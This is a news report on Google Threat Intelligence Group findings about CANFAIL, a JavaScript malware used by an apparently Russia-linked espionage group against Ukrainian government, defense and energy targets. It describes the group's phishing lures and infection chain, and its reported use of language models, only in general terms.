A newly identified cyber espionage group has been linked to a wave of digital attacks against Ukrainian institutions, according to findings released by the Google Threat Intelligence Group. Investigators say the activity involves a malware strain tracked as CANFAIL and assess that the operator is likely connected to Russian state intelligence interests.
The campaign has primarily focused on Ukrainian government structures at both regional and national levels. Entities tied to defense, the armed forces, and the energy sector have been repeatedly targeted. Analysts state that the selection of victims reflects strategic priorities consistent with wartime intelligence gathering.
Beyond these sectors, researchers observed that the actor’s attention has widened. Aerospace companies, manufacturers producing military equipment and drone technologies, nuclear and chemical research institutions, and international organizations engaged in conflict monitoring or humanitarian assistance in Ukraine have also been included in targeting efforts. This broader focus indicates an attempt to collect information across supply chains and support networks linked to the war.
While the group does not appear to possess the same operational depth as some established Russian hacking units, Google’s analysts note a recent shift in capability. The actor has reportedly begun using large language models to assist in reconnaissance, draft persuasive phishing content, and resolve technical challenges encountered after gaining initial access. These tools have also been used to help configure command-and-control infrastructure, allowing the attackers to manage compromised systems more effectively.
Email-based deception remains central to the intrusion strategy. In several recent operations, the attackers posed as legitimate Ukrainian energy providers in order to obtain unauthorized access to both organizational and personal email accounts. In separate incidents, they impersonated a Romanian energy supplier that serves Ukrainian clients. Investigators also documented targeting of a Romanian company and reconnaissance activity involving organizations in Moldova, suggesting regional expansion of the campaign.
To improve the precision of their phishing efforts, the attackers compile tailored email distribution lists based on geographic region and industry sector. The malicious messages frequently contain links hosted on Google Drive. These links direct recipients to download compressed RAR archives that contain the CANFAIL payload.
CANFAIL itself is a heavily obfuscated JavaScript program. It is commonly disguised with a double file extension, such as “.pdf.js,” to make it appear as a harmless document. When executed, the script launches a PowerShell command that retrieves an additional PowerShell-based dropper. This secondary component runs directly in system memory, a technique designed to reduce forensic traces on disk and evade conventional security tools. At the same time, the malware displays a fabricated error notification to mislead the victim into believing the file failed to open.
Google’s researchers further link this threat activity to a campaign known as PhantomCaptcha. That operation was previously documented in October 2025 by researchers at SentinelOne through its SentinelLABS division. PhantomCaptcha targeted organizations involved in Ukraine-related relief initiatives by sending phishing emails that redirected recipients to fraudulent websites. Those sites presented deceptive instructions intended to trigger the infection process, ultimately delivering a trojan that communicates over WebSocket channels.
The investigation illustrates how state-aligned actors continue to adapt their methods, combining traditional phishing tactics with newer technologies to sustain intelligence collection efforts tied to the conflict in Ukraine.
